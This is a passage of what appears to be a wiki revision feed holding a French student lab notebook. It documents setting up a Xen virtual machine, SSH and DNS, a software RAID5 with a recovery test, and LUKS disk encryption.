 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46192</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46192"/>
				<updated>2017-11-13T10:24:28Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Cryptage des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm). Copiez des données sur le RAID5, arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nous créons le volume /dev/md0:&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
///&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46191</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46191"/>
				<updated>2017-11-13T10:23:33Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Cryptage des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
